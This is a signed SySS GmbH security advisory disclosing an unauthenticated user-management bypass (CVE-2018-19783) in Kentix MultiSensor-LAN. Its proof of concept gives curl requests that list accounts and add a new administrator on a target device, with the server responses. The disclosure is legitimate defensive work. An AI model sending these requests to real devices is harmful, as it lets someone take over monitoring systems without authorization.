-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Advisory ID: SYSS-2018-043 Product: MultiSensor-LAN Manufacturer: Kentix GmbH Affected Version(s): 5.63.00 <= Tested Version(s): 5.60.01, 5.63.00 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel (CWE-288) Risk Level: High Solution Status: Open Manufacturer Notification: 2018-12-03 Solution Date: - Public Disclosure: 2019-01-17 CVE Reference: CVE-2018-19783 Authors of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Kentix MultiSensor LAN is a web-based management solution for monitoring server rooms (see [1]). The web site authentication can be bypassed to add another administrator account. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The web based application is not using a usual session concept with a session cookie for managing authenticated user sessions. Some URLs are protected with HTTP Basic Authentication, but the user management web page can be accessed and used without any authentication. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The current user list can be read out without any authentication (all values are Base64-encoded) using the following HTTP request: $ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io { "A05001":"YWRtaW4=", "A05002":"KioqKioq", "A05003":"", "A05021":"MASKED", "A05022":"KioqKioq", "A05023":"MASKED", "A05041":"MASKED", "A05042":"KioqKioq", "A05043":"MASKED", "A05061":"", "A05062":"", "A05063":"", "A05081":"", "A05082":"", "A05083":"" } There are five possible accounts, which are represented with the fields A0500[1-3], A0502[1-3], and so on. The first field is the user name, the second is the masked password, and the last one is the optional e-mail address. With the following simple HTTP request another user account is created (username and password are sent Base64-encoded, too): $ curl --data 'action=1&A05061=MWJj&A05062=MWJj&save=3' --url http://$TARGETIP/io { "A05061":"MWJj", "A05062":"KioqKioq" } With this created account, the web interface can be used very easily. It can be verified that the user account was added successfully via the previously shown HTTP request: $ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io { "A05001":"YWRtaW4=", "A05002":"KioqKioq", "A05003":"", "A05021":"MASKED", "A05022":"KioqKioq", "A05023":"MASKED", "A05041":"MASKED", "A05042":"KioqKioq", "A05043":"MASKED", "A05061":"MWJj", "A05062":"KioqKioq", "A05063":"", "A05081":"", "A05082":"", "A05083":"" } ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: As there was no response from the vendor, SySS GmbH is not aware of a solution for this security issue. Kentix MultiSensor LAN devices should be operated only in firewall protected LANs with enabled network access control to reduce the risk of unauthorized manipulations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-11-30: Detection of the vulnerability 2018-12-01: CVE number assigned 2018-12-03: Vulnerability reported to manufacturer 2019-01-17: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Support web site https://kentix.com/en/download-support/software-manuals-for-devices-until-01-2018/ [2] SySS Security Advisory SYSS-2018-043 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-043.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Micha Borrmann of SySS GmbH. E-Mail: micha.borrmann (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlxAXiUACgkQ7b4m5xTq WHZDug//cLSK7kjGDW3YSMDS7sCiJRtAl1gCPcdsPVgCaLpBnBp8aNKsylJhLxtc AF72qpiB38PXpuuMz8MwbI8pGlsc31paZkGms/JJTuwrXfumX5YtbNRtjhgXDvmS Si5JSvepH6zGRxfYihIFUAS/dchCa16zf4rCkyhCPKntPnk13eW0RkTYdX498PYv oa8L2QZo2O0sADuwddpWi9CtFV+VQuaY70BUyNS/B2q/otPEuPog33o+8AW2xx0c GNlahErbot48ZQTiwkGeBXDpP/kKWv8ccbY5dey1d4X53+X0zktKqhrYvTk2evGI F7o1JzwpT7QhpS4ZFFY6Oc2ve/6CV6wZaQyXmrjKoW9yEKMDkoiAVl5ppDYIF4iS NzKhiKOwlhyYrl1Ro4uZLSP92ePyxkEjjEwzEdXqXytQEB4Og1LhpHHmBKhBbr/V yYfg3e9Mg+GOh7CDRiHl1tCI1+03c4Sz3pQE8oC3xsyy/jv5gj4GO44LtlYy2xxo LDiw8/N0oPukjVrbFhtA8RX7fIOk/ZSsMhaj3Eca1SKantsHPxORCeXrcmkWom3v H2WR1TFEXWfCTURsilW5Blifh2b47es/qhtZ6NeeDGQOPlFtf6/fnDd/N89qcLMz USTQ5csy3Pr3ipLBWYtR2t/PSowoNyoWaE6O4d5LTfe1OtiIS1g= =sH2y -----END PGP SIGNATURE-----